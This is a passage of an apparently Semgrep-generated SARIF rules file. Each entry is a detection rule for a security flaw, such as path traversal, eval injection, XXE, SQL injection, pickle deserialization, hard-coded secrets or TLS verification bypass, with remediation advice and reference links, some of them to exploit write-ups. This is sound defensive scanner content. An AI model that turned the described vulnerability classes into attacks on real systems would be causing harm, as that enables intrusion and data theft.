region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","id":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","name":"terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-config-aggregator-not-all-regions.aws-config-aggregator-not-all-regions"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","id":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","name":"python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-fs-fastapi.tainted-path-traversal-fs-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","id":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","name":"javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.pg.node-pg-pool-hardcoded-secret.node-pg-pool-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information."},"help":{"markdown":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string)\n - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html)\n","text":"Found user data in a call to 'eval'. This is extremely dangerous because it can enable an attacker to execute remote code. See https://owasp.org/www-community/attacks/Code_Injection for more information."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.code.user-eval-format-string.user-eval-format-string","id":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","name":"python.django.security.injection.code.user-eval-format-string.user-eval-format-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.code.user-eval-format-string.user-eval-format-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls."},"help":{"markdown":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests)\n","text":"$METHOD is a state-changing MVC method that does not validate the antiforgery token or do strict content-type checking. State-changing controller methods should either enforce antiforgery tokens or do strict content-type checking to prevent simple HTTP request types from bypassing CORS preflight controls."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","id":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","name":"csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.mvc-missing-antiforgery.mvc-missing-antiforgery"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","id":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","name":"go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.xxe.gorilla-libxml2-xxe-taint.libxml2-xxe-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"help":{"markdown":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Add \"encryption: $Y.BucketEncryption.KMS_MANAGED\" or \"encryption: $Y.BucketEncryption.S3_MANAGED\" to the bucket props for Bucket construct $X"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","id":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","name":"typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-encryption.awscdk-bucket-encryption"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Onfido live API Token detected"},"help":{"markdown":"Onfido live API Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token)\n - [https://documentation.onfido.com/api/latest/#api-tokens](https://documentation.onfido.com/api/latest/#api-tokens)\n","text":"Onfido live API Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","id":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","name":"generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-onfido-live-api-token.detected-onfido-live-api-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"help":{"markdown":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n","text":"XMLDecoder should not be used to parse untrusted data. Deserializing user input can lead to arbitrary code execution. Use an alternative and explicitly disable external entities. See https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html for alternatives and vulnerability prevention."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-decoder.xml-decoder","id":"java.lang.security.audit.xml-decoder.xml-decoder","name":"java.lang.security.audit.xml-decoder.xml-decoder","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-decoder.xml-decoder"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure DES/3DES encryption algorithm(s) were detected. DES is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","id":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","name":"swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-des.insecure-crypto-algorithm-des"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jpa-sqli.jpa-sqli","id":"java.spring.security.jpa-sqli.jpa-sqli","name":"java.spring.security.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"help":{"markdown":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Redshift configuration with a SSL disabled. To fix this, set your `require_ssl` to `\"true\"`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","id":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","name":"terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-insecure-redshift-ssl-configuration.aws-insecure-redshift-ssl-configuration"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pandas-hdf-aws-lambda.tainted-pandas-hdf-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"help":{"markdown":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification)\n - [https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate](https://stackoverflow.com/questions/4072585/disabling-ssl-certificate-validation-in-spring-resttemplate)\n - [https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1](https://stackoverflow.com/questions/35530558/how-to-fix-unsafe-implementation-of-x509trustmanager-in-android-app?rq=1)\n","text":"Checks for redefinitions of functions that check TLS/SSL certificate verification. This can lead to vulnerabilities, as simple errors in the code can result in lack of proper certificate validation. This should only be used for debugging purposes because it leads to vulnerability to MTM attacks."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"help":{"markdown":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected)\n - [https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping](https://docs.makotemplates.org/en/latest/syntax.html#expression-escaping)\n - [https://jinja.palletsprojects.com/en/2.11.x/intro/#](https://jinja.palletsprojects.com/en/2.11.x/intro/#)\n","text":"Mako templates do not provide a global HTML escaping mechanism. This means you must escape all sensitive data in your templates using '| u' for URL escaping or '| h' for HTML escaping. If you are using Mako to serve web content, consider using a system such as Jinja2 which enables global escaping."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.mako-templates-detected.mako-templates-detected","id":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","name":"python.lang.security.audit.mako-templates-detected.mako-templates-detected","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.mako-templates-detected.mako-templates-detected"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-openpyxl-fastapi.tainted-path-traversal-openpyxl-fastapi)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - 